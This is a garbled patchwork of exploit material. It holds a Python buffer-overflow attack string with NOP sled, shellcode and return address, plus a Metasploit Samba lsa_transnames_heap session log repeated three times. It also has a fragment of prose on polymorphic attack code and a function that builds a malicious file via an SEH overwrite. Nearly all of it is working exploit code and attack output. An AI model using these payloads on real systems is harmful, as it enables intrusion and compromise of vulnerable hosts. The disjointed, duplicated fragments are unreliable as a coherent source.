"\xb3\x41\x55\xb1\xf3\xcd\xa6\x94\x05\x31\x71\xd1\x83\x43" +
"\xf4\x31\x48\xa1" )
#-----------------------attack string------------------------
# retFix | nopsled | payload, part 1 | ret | payload, part 2
#------------------------------------------------------------
print "[*] building attack string"
ret = "\x58\xFD\x9A\x00" # 0x009AFD58; taken
beforeRetSize = 268
shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\xC7\x93\xC2\x77"
"\xFF\xD1\xEB\xF7")
nopsled = "\x90" * (268 - len(shellcode))
ret = "\x58\xFD\x9A\x00"
payload = nopsled + shellcode + ret # 272 bytes
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
having a real polymorphic code, people always got confused with polymorphic
shellcode.
No, I am not writing another paper about polymorphic shellcode, there are
too many papers flying around since ADM created ADMutate, good papers about
nop sled, jmp sled, junk code insertion, etc… I am writing about a real
polymorphic code: a code that every time it executes it will have a new
appearance, a new fingerprint, being almost unpredictable, and, yes, I will
use some of the previous techniques to move forward and step ahead creating
a real polymorphic attack.
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
def createMaliciousFile(filename):
seh_offset = 0x9c4
jumper = 0x06ad890d # pop pop ret ... CHANGE IT! (dll is rebased)
shellcode = '\x90' * 0x400 + '\xCC' # nopsled and int 3
content = '\x00\x00' # header record type
content += '\x1a\x00' # header length
content += '\x05\x10\x04\x00\x00\x00\x00\x00\x09\x00\x00\x01'
content += '\x01\x00\x30\x8d\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00'
>
> msf exploit(lsa_transnames_heap) > set TARGET 1
> TARGET => 1
> msf exploit(lsa_transnames_heap) > exploit
> [*] Started bind handler
> [*] Creating nop sled....
> ...
> [*] Trying to exploit Samba with address 0x08415000...
> [*] Connecting to the SMB service...
> [*] Binding to
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
